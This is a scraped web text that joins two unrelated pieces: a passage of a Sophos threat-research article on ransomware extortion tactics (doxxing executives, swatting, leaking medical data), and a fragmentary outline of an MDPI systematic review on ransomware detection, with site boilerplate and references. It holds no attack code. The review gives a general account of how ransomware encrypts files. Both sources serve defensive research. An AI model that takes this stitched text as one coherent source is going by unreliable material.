Figure 4: Part of a post on the Monti ransomware leak site

We also noted an instance of a threat actor encouraging people whose personally identifiable information (PII) appeared in a data breach to “partake in litigation against the victim.” Moreover, the threat actor also provided a “snippet of the negotiations” and encouraged those affected to “express your concerns” to an executive at the targeted organization – providing not just that individual’s name, but also their telephone number.

Figure 5: A threat actor posts on a criminal forum, providing material for “those who wish to partake in litigation against the victim”

This tactic of naming specific individuals – along with contact details – is used by more than one ransomware gang. The Qiulong group, for example, regularly includes the details of CEOs and business owners on its leak site, often accompanied by insults, personal information, and accusations of negligence.

Figure 6: A post on the Qiulong ransomware leak site. Note the reference (redacted in the image above) to a specific make of car the CEO drives

Similarly, the Snatch threat actor regularly names specific individuals as “responsible” for data breaches.

Figure 7: A post on the Snatch leak site, which names a specific individual who Snatch claims is “responsible for data leakage”

Figure 8: The Snatch threat actor explains its reasoning for including the personal data of business owners and authority figures on its leak site

In one case, we noted that the Monti ransomware group had not just named a business owner and published their Social Security number, but had also posted an image of them, crudely edited to include devil horns and a speech bubble reading “I’m a dumb p***y who doesn’t care about my clients.”

From the perspective of ransomware operators, referring to specific individuals serves three purposes. First, it provides a ‘lightning rod’ for any subsequent blame, pressure, and/or litigation. Second, it contributes to the threat of reputational damage (covered in the next section). And third, personal attacks can menace and intimidate the leadership of the targeted organization.

It may seem somewhat ironic that threat actors are weaponizing legislation to achieve their own illegal objectives, and the extent to which this tactic has been successful is unclear. However, when used, it likely adds to the already considerable pressure experienced by C-suite executives – particularly in the context of at least one CEO previously being convicted following legal action related to a ransomware attack. While out of scope for this particular article, it’s worth noting that the current legal landscape pertaining to the personal risk and accountability of CEOs and CISOs in such situations appears uncertain. While we’re not aware of any convictions arising from ransomware groups referring breach information to regulators or law enforcement, that doesn’t mean it won’t happen in the future – and the possibility is likely to be of concern to C-suites.

Moreover, the fact that some ransomware operators claim to take a vigilante role to expose wrongdoing, irregularities, and criminal activity within organizations presents an interesting ethical issue, despite the irony that doing so supports their own criminal activity.

Ethics, reputational damage, and embarrassment

In Figure 4 above, the WereWolves ransomware group claimed to expose (and threatened to report) serious criminal activity allegedly occurring at an organization. While this in no way negates the illegality and seriousness of ransomware attacks, it raises an ethical dilemma: Which is worse, the ransomware attack itself, or the attackers’ revelation of potentially criminal activity taking place within the organization that was victimized?

Many ransomware criminals thrive in this ethical grey area, and want to appear moral, ethical, or genuinely concerned about security and confidentiality. As we noted in our previous article on this topic , numerous ransomware gangs are attempting to ‘flip the script’ and portray themselves as a force for good, by referring to themselves as “honest…pentesters”, or as a “penetration testing service” conducting “cybersecurity [studies]” or “security audit[s].” Of course, legitimate penetration testers operate with the prior permission of, and under parameters set by (and sometimes, active supervision by) the companies who hire them; ransomware criminals do not.

Cactus, for instance, describes itself as a “Direct Security Audit Agency (DSAA) revolutionizing a customer journey, one hyper-targeted solution at a time.” The language here is – probably intentionally – reminiscent of corporate marketing material.

Figure 9: On the FAQ page on its leak site, the Cactus ransomware group claims that it conducts “network security audits”

In contrast, many ransomware gangs refer to their targets as “irresponsible,” “negligent,” or uncaring.

Figure 10: The 8Base leak site mentions “irresponsible processing of…personal data and business secrets” and includes the statement that “we are sorry that you were affected by companies’ negligent attitude to the privacy and security of their customers’ personal data.” Note the claim that this “gives you the opportunity to request compensation”

Of particular interest in Figure 10 is 8Base’s promise that they will “remove personal information from disclosure on demand…at no cost to you,” following requests from individual clients of the targeted organization.

Again, this is (perhaps) an attempt to make the group appear reasonable and ethical, but it’s also combined with a pressure tactic aimed at the organization. In the same paragraph, 8Base notes that “in addition we will provide your data set that you can use in a lawsuit to compensate the damage caused to you.”

Figure 11: In a post on its leak site, the Blacksuit ransomware group claims that the management of a targeted organization “does not care about you or your personal information”

Figure 12: A screenshot of the Space Bears leak site, asking visitors whether they trust targeted companies with their data

In many cases, this criticism continues after negotiations have broken down and victims have decided not to pay. For instance, the Karakurt group, in a ‘press release,’ called out a hospital after it failed to pay a ransom.

Figure 13: The Karakurt group criticizes a hospital after it failed to pay the ransom, calling it “dishonest and irresponsible”

Typically, in the context of exposing security weaknesses and negligence, ransomware operators portray themselves as morally superior to their targets. Occasionally, the waters are muddied further.

The Malas ransomware gang, for example, demands that its victims “make a donation to a nonprofit of their choice.”

Figure 14: An excerpt from a post on the Malas ransomware gang’s leak site. The quotation in the last response is attributed to financier Warren Buffet

Other threat actors have previously adopted a similar approach. In 2022, for example, the GoodWill ransomware group demanded that victims perform charitable activities – such as feeding poor children, or providing clothes and blankets to the unhoused – and post video evidence online. In 2020, the Darkside ransomware gang claimed to have donated a proportion of its gains to two charities . As far as we can tell, there were no known victims of the GoodWill ransomware strain, so we don’t know if the tactic was successful, and at least one of the two charities to which Darkside donated funds stated that it would not be keeping the money.

Malas, however, takes things a step further. In addition to requiring charitable donations, it also explicitly criticizes specific organizations on the basis of alleged ethical shortcomings – arguably combining ransomware with hacktivism.

Figure 15: A post on the Malas leak site following an attack on a collection agency (a company that attempts to recover debts on behalf of creditors)

Figure 16: Another post on the Malas leak site, referring to an attack on an organization in the natural resources sector

Malas admits that this approach has not been particularly successful. On its FAQ, its response to the question “Has it been effective?” is an unequivocal “So far, no.” Interestingly, the author of the FAQ claims that one of the reasons for this is that victims “won’t send money to genuine grass-roots organizations.”

Figure 17: Malas goes into some detail as to why it believes its approach has not been effective

However, in attempting to present its targets as morally deficient, Malas is essentially no different to its peers. It leverages the threat of reputational damage, in the same way that other ransomware gangs do. The intent is to reduce trust and good faith, with the proposed solution being for the target to pay up and therefore negate, at least partially, any adverse impact.

Malas is also no different to its peers when it comes to its communications with victims. Like other ransomware groups, it threatens to sell or publish data and inform journalists and customers.

Figure 18: An excerpt from the Malas leak site

The prevalence of this threat was something we noted both in our article on ransomware gangs and the media, and in our 2021 examination of ransomware pressure tactics. Conscious that many news outlets are keen to publish stories on ransomware, and that media attention may compound reputational damage to organizations and increase the pressure to pay up, many ransomware gangs explicitly make this threat on their leak sites, and will solicit media coverage and communication with journalists.

In addition, some threat actors also threaten to notify customers, partners, and competitors. The intent here is to generate and intensify pressure from multiple angles and sources: media attention, customers, clients, other companies, and potentially regulatory bodies too.

Figure 19: An excerpt from the FAQ on the Cactus leak site. Note the threats that “it is highly likely that you will be sued,” and that “journalists, researchers, etc. will dig through your documents, finding inconsistencies or irregularities”

Figure 20: An excerpt from the FAQ on the Play leak site. Note that there is some similar wording to the Cactus notice in Figure 19, in the answer to the “What happens if we don’t pay?” question

We noted in our 2021 article that the threat of leaked personal data was a big concern for organizations (and, of course, for the individuals involved), with both privacy and potential legal ramifications. While this is still the case, in recent years ransomware gangs have stepped up their game, sometimes leaking, or threatening to leak, particularly sensitive data.

Sensitive data, swatting, and more

Several ransomware groups have published sensitive medical data following attacks. This has included mental health records , the medical records of children , and, recently, blood test data .

In a world where data breaches are increasingly commonplace, threatening to leak extremely sensitive data exacerbates the pressure on victim organizations, and can cause considerable distress and concern to those affected.

In some cases, we noticed ransomware gangs explicitly calling this out on their leak site – noting that stolen data included “images of nude patients” and “information about patients’ sexual problems.”

Figure 21: A post on the Qiulong leak site

Figure 22: Another post on the Qiulong leak site

In one particularly concerning example, the Qiulong ransomware group posted screenshots of a CEO’s daughter’s identity documents, along with a link to her Instagram profile.

Figure 23: The Qiulong ransomware group posts personal data of a CEO’s daughter on its leak site. From the limited context provided, this may have been an act of revenge after negotiations had broken down

In 2021, we noted that ransomware gangs would sometimes email and call employees and customers in order to increase pressure on organizations. However, in recent years, threat actors appear to be increasingly interested in not merely threatening organizations directly, but also secondary victims, as in Figure 23. For instance, as reported in January 2024, attackers threatened to ‘swat’ patients of a cancer hospital , and have sent threatening text messages to a CEO’s spouse .

As we wrote in 2021, ransomware operators will often warn their victims not to contact law enforcement. However, the threat of swatting demonstrates some attackers’ willingness to weaponize law enforcement when it suits them – not unlike their willingness to weaponize legislation and regulations.

An escalation in tactics

While many ransomware gangs are still using the pressure tactics we reported on in 2021, there appears to have been an escalation. It’s not certain whether this is driven by increasing numbers of victims opting not to pay ransoms, competition from other threat actors, ransomware groups feeling increasingly emboldened, or other factors. However, what is apparent is that all the tactics we discuss here are designed to intimidate targeted organizations and people linked to them.

Some ransomware groups will weaponize any legitimate resource to increase the pressure on their targets – whether that’s the news media, as we explored in our earlier article, law enforcement, or threats of civil legal action or reporting malfeasance to regulatory authorities. While it’s probably too early to say if this approach is effective (and, it’s also worth noting, the threat isn’t always carried out), the criminals’ objective is to generate pressure from multiple angles and sources.

The use of phone calls and swatting also indicate a willingness to move threats from the digital sphere and into the real world. Swatting, in particular, is an extremely dangerous crime that has on some occasions resulted in injury and death , as well as significant psychological distress.

In the future, ransomware gangs appear likely to continue to devise and employ novel strategies to coerce their victims into paying, and to inflict reputational damage – and perhaps worse – if ransoms are not paid.

Sophos has several resources to help defenders protect against ransomware. You can find best practice guidance , an anti-ransomware toolkit, a link to our incident response services, and links to several of our ransomware-related reports here . Specific advice on configuring Sophos products to prevent ransomware is also available .

• Share on Facebook
• Share on LinkedIn

Sophos X-Ops

Read similar articles, what to expect when you’ve been hit with avaddon ransomware, what’s new in sophos edr 4.0, sophos xdr: driven by data, leave a reply cancel reply.

Your email address will not be published. Required fields are marked *

Save my name, email, and website in this browser for the next time I comment.

Information

• Author Services

Initiatives

You are accessing a machine-readable page. In order to be human-readable, please install an RSS reader.

All articles published by MDPI are made immediately available worldwide under an open access license. No special permission is required to reuse all or part of the article published by MDPI, including figures and tables. For articles published under an open access Creative Common CC BY license, any part of the article may be reused without permission provided that the original article is clearly cited. For more information, please refer to https://www.mdpi.com/openaccess .

Feature papers represent the most advanced research with significant potential for high impact in the field. A Feature Paper should be a substantial original Article that involves several techniques or approaches, provides an outlook for future research directions and describes possible research applications.

Feature papers are submitted upon individual invitation or recommendation by the scientific editors and must receive positive feedback from the reviewers.

Editor’s Choice articles are based on recommendations by the scientific editors of MDPI journals from around the world. Editors select a small number of articles recently published in the journal that they believe will be particularly interesting to readers, or important in the respective research area. The aim is to provide a snapshot of some of the most exciting work published in the various research areas of the journal.

Original Submission Date Received: .

• Active Journals
• Find a Journal
• Proceedings Series
• For Authors
• For Reviewers
• For Editors
• For Librarians
• For Publishers
• For Societies
• For Conference Organizers
• Open Access Policy
• Institutional Open Access Program
• Special Issues Guidelines
• Editorial Process
• Research and Publication Ethics
• Article Processing Charges
• Testimonials
• Preprints.org
• SciProfiles
• Encyclopedia

Article Menu

• Subscribe SciFeed
• Recommended Articles
• Google Scholar
• on Google Scholar
• Table of Contents

Find support for a specific problem in the support section of our website.

Please let us know what you think of our products and services.

Visit our dedicated information section to learn more about MDPI.

JSmol Viewer

Earlier decision on detection of ransomware identification: a comprehensive systematic literature review.

1. Introduction

• Provides a detailed overview of how ransomware has developed over time, focusing on its mechanisms, types, and the vectors used for attacks.
• Conducts a comprehensive review of the current approaches in ransomware detection. In addition, emphasizes the techniques and methods used at various stages of detection.
• Highlights how ML is being employed to improve ransomware detection.
• Identifies the gaps in current research and suggests potential areas for future investigations to enhance the cybersecurity field’s defense against ransomware attacks.

2. Papers Selection for Literature Review

2.1. methodology, 2.2. search string, 2.3. data sources, 2.4. screening process, 3. background, 3.1. overview of ransomware attacks, 3.2. types of ransomware.

• Encrypting Ransomware: This type is the most common and involves encrypting the victim’s files with a strong encryption algorithm, making them inaccessible without a decryption key. Notable examples include Cryptowall, WannaCry, and Cryptolocker. The victim can see the files but cannot open them unless they pay the ransom to obtain the decryption key.
• Non-Encrypting Ransomware: Also known as locker ransomware, this type locks you out of your entire device, not just specific files. The data remain unharmed but inaccessible. To regain access, the victim must pay a ransom. Examples include CTB-Locker and Winlock.
• Scareware: also known as fake antivirus, scareware tries to convince the victim that their device is infected by showing a false warning and then asking for payment to access the full version of the software to remove or mitigate the risk. Scareware typically uses social engineering methods rather than encrypting the files or devices to scare the victims and then force them to pay.
• PC/Workstation ransomware: This type targets personal computers and workstations, exploiting vulnerabilities in Windows, macOS, or Linux systems. Examples include the infamous WannaCry attack, which specifically targeted Windows systems using a network exploit.
• Mobile ransomware: Targeting mobile devices, this type of ransomware affects smartphones and tablets, primarily through malicious apps or compromised websites. Android devices are more frequently targeted due to the ease of installing apps from third-party sources.
• IoT ransomware: IoT devices, such as smart home gadgets and industrial sensors, are increasingly being targeted due to their poor security measures. Attacks on these devices can lead to significant disruptions, especially when they affect critical infrastructure.
• Individual users: This group is often the easiest target due to less stringent security practices. Attackers exploit this by using deceptive emails or malicious websites to initiate ransomware infections.
• Enterprises: Businesses are targeted for their valuable data and deeper financial resources. Attacks may involve sophisticated strategies to infiltrate network defenses and encrypt critical business data.
• Government and critical infrastructure: Attacks on government systems and critical infrastructure aim to cause significant disruption, often impacting national security, healthcare, and essential services.
• Online Services: Cloud services and online platforms, such as social media and banking services, are also targeted, with attackers aiming to encrypt or steal large amounts of data to demand higher ransoms.

3.3. Ransomware Attack Vectors

3.4. evolution of ransomware, 3.5. ransomware encryption techniques.

• Generate the key: A unique key is generated to be used in symmetric encryption.
• Encrypt the files: The victim’s files are encrypted by ransomware using a single secret key. Ransomware targets the victim’s sensitive information and files, such as documents, photos, and videos.
• Protect the key: To prevent key recovery by the victim, ransomware encrypts it until payment is made. Then, the encrypted key is saved on the attacker’s servers.
• Advanced Encryption Standard (AES): AES is one example of a symmetric encryption algorithm. It is secure and cannot be cracked easily. The key length used in the AES algorithm to encrypt victims’ files is 128-, 192-, or 256-bit [ 25 ].
• Generate the keys: a pair of keys is generated to be used in asymmetric encryption.
• Encrypt the file using the public key: the victim’s files are encrypted using the public key.
• Protect the private key: the private key is stored on the attacker’s servers until payment is made by the victim.
• Examples of asymmetric encryption algorithms: RSA encryption: RSA is one example of an asymmetric encryption algorithm. It contains two keys, which are the public key and the private key. The public key is used for the encryption algorithm, which is used to encrypt the victim’s files, and the private key is used for the decryption algorithm, which is used for the decryption and stored remotely on the attacker’s servers [ 26 ]. Elliptic Curve Cryptography (ECC): ECC is another example of an asymmetric encryption algorithm. ECC key length is shorter than RSA and more secure. As with RSA, ECC consists of two keys, which are public and private—one for encrypting the files and another for decrypting [ 27 ].

3.6. Signs of a Ransomware Attack

3.7. challenges in early detection of ransomware, 3.8. the role of artificial intelligence to improve ransomware detection.

Click here to enlarge figure

• Deep learning: Deep learning (DL) techniques are proposed to solve the restrictions of traditional ransomware detection methods, which help to improve reliability, accuracy, and performance. It is suitable for dealing with an unorganized dataset that requires minimal or no human intervention because of its self-learning capabilities. They operate particularly well at identifying text- and image-based ransomware because of how well they can categorize voice, text, and image data. DL methods can be problematic for general-purpose applications, especially those with tiny datasets or sizes, as they require a large quantity of data to train them. High processing power requirements and trouble adjusting to real-world datasets are two further issues with DL [ 46 ].
• Artificial neural networks: Artificial neural network techniques are used in a broad range, which makes them suitable for detecting many kinds and variations of ransomware data, including variants that target images and text. Because of their capacity for ongoing learning, neural networks make an ideal choice for recognizing zero-day attacks and adjusting to new ransomware data. Neural networks can detect many types of ransomware data and adjust to new threats due to their versatility. However, because of the black-box nature of the technology and their reliance on hardware, these techniques can be susceptible to data dependencies, making it more difficult for human analysts to keep an eye on data processing and spot anomalies [ 47 ].
• Ransomware behavioral analysis: One successful study used ML as a defense mechanism against ransomware attacks. The analysis considered seven ransomware and seven benign software samples to distinguish between benign and malicious software with low false negative and false positive rates. Values from different ransomware, such as Dynamic Link Libraries (DLLs), were extracted in this study. DLLs are a type of file used in Windows operating systems to hold multiple codes and procedures that are shared among various applications. Essentially, DLLs allow programs to use functionalities that are stored in separate files rather than having to include them within the program itself. This not only helps in saving space but also promotes code reuse and modular programming. When a program runs, it can call upon a DLL file to perform certain functions, which helps in efficient memory usage and reduces the application’s load time because it only loads the necessary parts. DLLs are crucial for the operating system to manage shared resources effectively, enabling smoother and more performance-efficient operation of software on your computer. Early detection of ransomware attacks and alerting the user about the existing threat are considered a main feature of this proposed system [ 48 ].
• Anomaly detection in network traffic: In [ 49 ], AI algorithms and ML techniques were used to detect anomalies by analyzing network traffic. This process is performed by labeling normal and abnormal features and utilizing ML to detect the unusual status of the network. The system succeeded in isolating harmful activities, allowing early detection, and taking the necessary preventive measures.
• Signature-based ransomware detection: ML models were used in some systems that aim to detect ransomware signatures. Ransomware tends to constantly change its signatures to prevent detection by traditional detection techniques. ML models are constantly updated to identify new forms of ransomware, which allows for early detection and appropriate decision-making [ 19 ].

3.9. Preventive Measures and Best Practices

• Employee education and awareness: Increasing individuals’ awareness of the dangers of ransomware and educating them on cybersecurity best practices, such as detecting suspicious messages and avoiding downloading files or programs from suspicious or unreliable links [ 13 ].
• Strong password policies: Forcing the user to use strong and complex passwords. In addition, it is necessary to change the passwords regularly and use password management programs for better management and security [ 50 ].
• Multi-factor authentication (MFA): Using multi-layer protection to safeguard sensitive data or files such as passwords, voice recognition, and facial recognition [ 51 ].
• Regular backups: Regular backups of sensitive data are made to mitigate the damage in case hackers gain access to the original data [ 52 ].
• Timely updates: Ensure that all programs and operating systems are updated to the latest version and allow automatic updating of these preventive programs once connected to the Internet [ 22 ].
• Network segmentation and access Control: Applying the principle of network segmentation to isolate important data from other data. In addition, implementing the least privilege principle by granting privileges to users as needed to perform tasks [ 53 ].

3.10. Regulatory and Legal Considerations

3.11. future trends in ransomware, 4. comprehensive analysis of ransomware: detection, prevention, and trends, 4.1. indicators of potential ransomware incidence.

• Excessive File Operations: A noticeable rise in file access activities. For example, opening or attempting to open a large number of files in a short time frame. This may indicate an ongoing ransomware attack.
• Altered Input/Output Behavior: The input and output patterns where the structure and volume of data being processed significantly change.
• High Volume of Write Operations: A large increase in write or overwrite operations on the system could suggest that files are being encrypted by ransomware.
• Use of Encryption Functions: The call of Application Programming Interfaces (APIs) by a process not typically associated with.
• Rapid File Modification Requests: Frequent requests to read, modify, or delete files within a short period of time. These could be signs of ransomware attempting to encrypt or erase data.
• Unusual Network Communications: Initiating communications with a command-and-control (C2) server. This is a common step for ransomware to receive instructions or transmit encryption keys.
• Registry Key Modifications: Unexpected changes in the keys associated with system startup or file associations.

4.2. Ransomware Attack Framework

• Target Identification: the initial phase involves selecting and identifying vulnerable systems or networks as potential targets for the attack.
• Infection Vector Distribution: this step encompasses executing the ransomware through chosen delivery mechanisms—this could be by phishing emails, compromised websites, or malicious downloads.
• Ransomware Installation: after successful entry into the system, the ransomware installs itself.
• Encryption Key Generation and Retrieval: the ransomware then generates an encryption key to lock the victim’s files.
• File Access: targeting the data that are valuable to the user.
• Data Encryption: this phase encrypts the victim’s files, making them inaccessible without the decryption key.
• Post-Encryption Operations: After encryption, the ransomware may perform additional actions, such as deleting system backups.
• Ransom Demand: Finally, the attacker demands a ransom from the victim, often in a cryptocurrency.

4.3. Behavior Patterns of Ransomware Attacks

• Type A Behavior: Ransomware directly encrypts the original files without creating copies. The steps include opening, reading, encrypting, and then closing the files. Sometimes, it may also rename the encrypted files to indicate they have been compromised.
• Type B Behavior: Ransomware removes the original files from their location, creates encrypted copies, and then returns these encrypted versions to the original directory. The encrypted files might have different names from the originals, satisfying their encryption status.
• Type C Behavior: Reading the original files and creating separate encrypted versions. The original files are deleted to eliminate any trace of the unencrypted data. The deletion is typically achieved through file movement operations that overwrite the originals.

4.4. Comparison of Ransomware Detection Methods

4.5. effectiveness of current ransomware detection approaches, 4.6. taxonomy of ransomware detection technique.

• Static Analysis: This involves checking the code of a suspicious file without running it [ 5 ]. The process includes examining the file structure, identifying any embedded strings (like text), and looking for known malicious patterns. To detect ransomware, some tools and studies focus on analyzing the parts of a file that do not change. However, as ransomware evolves, these static methods might not always work, especially with ransomware that hides its true nature [ 13 ].
• Dynamic Analysis: The suspicious file is actually run in a controlled environment to observe what it does [ 5 ]. This might include looking at the file’s behavior, which files it tries to change [ 5 ], and how it interacts with the computer’s system. Various studies have used dynamic analysis to understand how ransomware behaves during an attack. This approach has been effective in detecting new types of ransomware but requires careful setup to avoid actual damage [ 13 ].
• Hybrid Analysis: Combines static and dynamic methods for a more comprehensive examination by looking at both the file’s code and its behavior when executed. This approach aims to detect ransomware that might pass through with just one type of analysis. Hybrid analysis has shown promise in identifying ransomware early in the infection process. It benefits from the strengths of both static and dynamic analysis. Therefore, it offers a stronger detection method.

4.7. Emerging Trends in Ransomware

4.8. ransomware avoidance strategies.

• Keep software up to date: Regularly updating the operating system and all applications is crucial. These updates often include patches for security vulnerabilities that ransomware attackers exploit.
• Unknown emails and downloads: Avoid opening emails or downloading attachments from unknown or suspicious sources. Cybercriminals often use phishing emails to spread ransomware.
• Use browser security features: Enable security features in web browsers that can block malicious websites and downloads. Disabling JavaScript and Java on untrusted sites can also help prevent ransomware from being downloaded on your device.
• Limit access to important files: Use features like “Controlled Folder Access” on Windows to prevent unauthorized applications from modifying protected folders. This step is particularly effective in stopping ransomware from encrypting your files.
• Backup your data: Regularly back up your data and ensure that backups are stored in a secure location and disconnected from your main network. As a result, if you do fall victim to a ransomware attack, you can restore your data from the backup without paying the ransom.
• Use security software: Employ antivirus and anti-ransomware software to detect and prevent ransomware threats. Keep this software up to date to protect against the latest ransomware variants.

5. Real-World Ransomware Incidents

• WannaCry Global Ransomware Attack (2017): In May 2017, the WannaCry ransomware attack spread across over 150 countries and infected more than 250,000 computers [ 64 ]. The attack exploited a vulnerability in Microsoft Windows in which a patch had been released but not widely applied [ 64 ]. One of the victims of this attack was the UK’s National Health Service (NHS). The ransomware encrypted files and demanded Bitcoin payments to release the encrypted data [ 64 ]. The attack highlighted the importance of regular software updated and the strong impact of ransomware on critical infrastructure and services. It also marked a turning point in encouraging global awareness and efforts to combat cyber threats.
• Colonial Pipeline Attack (2021) The Colonial Pipeline ransomware attack in May 2021 underscored the vulnerability of critical infrastructure to cyberattacks [ 65 ]. The Colonial Pipeline, which carries gasoline and jet fuel over 5500 miles (about 8850 km) between Texas and New York [ 65 ], was forced to shut down operations due to a ransomware attack by a group known as DarkSide [ 65 ]. This disruption led to a significant increase in gas prices, panic buying, and fuel shortages across the Eastern United States [ 65 ]. The company paid a ransom of nearly USD 5 million in cryptocurrency to regain access to their systems [ 65 ]. This incident encouraged the U.S. government to issue new cybersecurity directives for pipeline operators [ 65 ]; moreover, it emphasized the national security implications of ransomware attacks.
• Atlanta City Government Attack (2018) In March 2018, the city government of Atlanta, Georgia, was hit by a ransomware attack [ 66 ]. This attack hit a big part of its digital infrastructure [ 66 ]. The SamSam ransomware attack affected multiple city services, which included court proceedings, bill payments, and law enforcement activities [ 66 ]. These affected services demonstrated how ransomware could damage the day-to-day operations of a city. They demanded a ransom of USD 51,000 in Bitcoin but the city chose not to pay [ 66 ]. The recovery and mitigation efforts cost the city an estimated USD 17 million [ 66 ]. This incident provided motivation to other cities across the United States to strengthen their cybersecurity defenses.
• University of California, San Francisco (UCSF) Attack (2020): The University of California, San Francisco (UCSF), fell victim to a ransomware attack in June 2020. This attack targeted the School of Medicine’s IT infrastructure [ 67 ]. They faced the potential loss of critical academic research data, including work related to COVID-19 [ 67 ]. UCSF chose to pay a ransom of over USD 1.14 million [ 67 ]. The NetWalker ransomware group was responsible for the attack [ 67 ]. They exploited vulnerabilities in unsecured networks [ 67 ]. This incident satisfied the complex ethical and financial decisions ransomware victims must take when critical scientific research is in danger.

6. Comparison with Other Review Papers

7. related study.

8. Open Challenges and Limitations

9. future directions, 9.1. development of new detection algorithms, 9.2. integration of ai and ml, 9.3. impact of emerging technologies, 9.4. improved data collection and sharing, 9.5. development of resilient backup solutions, 10. conclusions, author contributions, institutional review board statement, informed consent statement, data availability statement, acknowledgments, conflicts of interest, abbreviations.

• Ozer, M.; Varlioglu, S.; Gonen, B.; Bastug, M. A prevention and a traction system for ransomware attacks. In Proceedings of the 2019 International Conference on Computational Science and Computational Intelligence (CSCI), Las Vegas, NV, USA, 5–7 December 2019; pp. 150–154. [ Google Scholar ]
• Xia, T.; Sun, Y.; Zhu, S.; Rasheed, Z.; Shafique, K. Toward a network-assisted approach for effective ransomware detection. arXiv 2020 , arXiv:2008.12428. [ Google Scholar ] [ CrossRef ]
• Alqahtani, A.; Sheldon, F.T. A survey of crypto ransomware attack detection methodologies: An evolving outlook. Sensors 2022 , 22 , 1837. [ Google Scholar ] [ CrossRef ] [ PubMed ]
• Beaman, C.; Barkworth, A.; Akande, T.D.; Hakak, S.; Khan, M.K. Ransomware: Recent advances, analysis, challenges and future research directions. Comput. Secur. 2021 , 111 , 102490. [ Google Scholar ] [ CrossRef ] [ PubMed ]
• Razaulla, S.; Fachkha, C.; Markarian, C.; Gawanmeh, A.; Mansoor, W.; Fung, B.C.; Assi, C. The age of ransomware: A survey on the evolution, taxonomy, and research directions. IEEE Access 2023 , 11 , 40698–40723. [ Google Scholar ] [ CrossRef ]
• The Latest Ransomware Statistics (Updated June 2024)|AAG IT Support. Available online: https://aag-it.com/the-latest-ransomware-statistics/ (accessed on 19 June 2024).
• Altulaihan, E.; Alismail, A.; Hafizur Rahman, M.; Ibrahim, A.A. Email Security Issues, Tools, and Techniques Used in Investigation. Sustainability 2023 , 15 , 10612. [ Google Scholar ] [ CrossRef ]
• The PRISMA 2020 Statement: An Updated Guideline for Reporting Systematic Reviews. Available online: https://www.bmj.com/content/372/bmj.n71 (accessed on 19 June 2024).
• Alraizza, A.; Algarni, A. Ransomware detection using machine learning: A survey. Big Data Cogn. Comput. 2023 , 7 , 143. [ Google Scholar ] [ CrossRef ]
• Ransomware Payments Exceed 1 Billion in 2023, Hitting Record High after 2022 Decline. Available online: https://databreaches.net/2024/02/09/ransomware-payments-exceed-1-billion-in-2023-hitting-record-high-after-2022-decline/ (accessed on 7 February 2024).
• Arslanian, M.; Roberts, H.; Welfer, J.; Xie, S.; Chen, B. The WannaCry Ransomware. Available online: https://verifythesource.org/posts/wannacry (accessed on 20 April 2024).
• Permana, G.R.; Trowbridge, T.E.; Sherborne, B. Ransomware mitigation: An analytical investigation into the effects and trends of ransomware attacks on global business. PsyArXiv 2022 . [ Google Scholar ] [ CrossRef ]
• Kapoor, A.; Gupta, A.; Gupta, R.; Tanwar, S.; Sharma, G.; Davidson, I.E. Ransomware detection, avoidance, and mitigation scheme: A review and future directions. Sustainability 2021 , 14 , 8. [ Google Scholar ] [ CrossRef ]
• Cen, M.; Jiang, F.; Qin, X.; Jiang, Q.; Doss, R. Ransomware early detection: A survey. Comput. Netw. 2024 , 239 , 110138. [ Google Scholar ] [ CrossRef ]
• Kovács, A. Ransomware: A comprehensive study of the exponentially increasing cybersecurity threat. Insights Reg. Dev. 2022 , 4 , 96–104. [ Google Scholar ] [ CrossRef ]
• DS, K.P.; HR, P.K. A Systematic Study on Ransomware Attack: Types, Phases and Recent Variants. In Proceedings of the 2024 5th International Conference on Intelligent Communication Technologies and Virtual Mobile Networks (ICICV), Tirunelveli, India, 11–12 March 2024; pp. 661–668. [ Google Scholar ]
• Chaithanya, B.; Brahmananda, S. Detecting ransomware attacks distribution through phishing URLs Using Machine Learning. In Computer Networks and Inventive Communication Technologies: Proceedings of Fourth ICCNCT 2021 ; Springer: Singapore, 2022; pp. 821–832. [ Google Scholar ]
• Fuertes, W.; Arévalo, D.; Castro, J.D.; Ron, M.; Estrada, C.A.; Andrade, R.; Peña, F.F.; Benavides, E. Impact of social engineering attacks: A literature review. In Developments and Advances in Defense and Security: Proceedings of MICRADS 2021 ; Springer: Singapore, 2022; pp. 25–35. [ Google Scholar ]
• Ren, A.; Liang, C.; Hyug, I.; Broh, S.; Jhanjhi, N. A three-level ransomware detection and prevention mechanism. EAI Endorsed Trans. Energy Web 2020 , 7 , e6. [ Google Scholar ] [ CrossRef ]
• Fernando, D.W.; Komninos, N.; Chen, T. A study on the evolution of ransomware detection using machine learning and deep learning techniques. IoT 2020 , 1 , 551–604. [ Google Scholar ] [ CrossRef ]
• Mohammad, A.H. Ransomware evolution, growth and recommendation for detection. Mod. Appl. Sci. 2020 , 14 , 68. [ Google Scholar ] [ CrossRef ]
• Humayun, M.; Jhanjhi, N.; Alsayat, A.; Ponnusamy, V. Internet of things and ransomware: Evolution, mitigation and prevention. Egypt. Inform. J. 2021 , 22 , 105–117. [ Google Scholar ] [ CrossRef ]
• Dand, P.; Chudasama, D. A Comparative Study about the Ransomware. J. Adv. Database Manag. Syst. 2021 , 8 , 8–15. [ Google Scholar ]
• Begovic, K.; Al-Ali, A.; Malluhi, Q. Cryptographic ransomware encryption detection: Survey. Comput. Secur. 2023 , 132 , 103349. [ Google Scholar ] [ CrossRef ]
• Cicala, F.; Bertino, E. Analysis of encryption key generation in modern crypto ransomware. IEEE Trans. Dependable Secur. Comput. 2020 , 19 , 1239–1253. [ Google Scholar ] [ CrossRef ]
• Reshmi, T. Information security breaches due to ransomware attacks—A systematic literature review. Int. J. Inf. Manag. Data Insights 2021 , 1 , 100013. [ Google Scholar ] [ CrossRef ]
• Mohammad, A.H. Analysis of ransomware on windows platform. Int. J. Comput. Sci. Netw. Secur. 2020 , 20 , 21–27. [ Google Scholar ]
• Vasoya, S.; Bhavsar, K.; Patel, N. A systematic literature review on Ransomware attacks. arXiv 2022 , arXiv:2212.04063. [ Google Scholar ]
• Bae, S.I.; Lee, G.B.; Im, E.G. Ransomware detection using machine learning algorithms. Concurr. Comput. Pract. Exp. 2020 , 32 , e5422. [ Google Scholar ] [ CrossRef ]
• Lemmou, Y.; Lanet, J.L.; Souidi, E.M. A behavioural in-depth analysis of ransomware infection. IET Inf. Secur. 2021 , 15 , 38–58. [ Google Scholar ] [ CrossRef ]
• Anand, V.K.; Bamanjogi, K.; Shaw, A.R.; Faheem, M. Comparative study of ransomwares. In Proceedings of the 2022 7th International Conference on Computing, Communication and Security (ICCCS), Seoul, Republic of Korea, 3–5 November 2022; pp. 1–9. [ Google Scholar ]
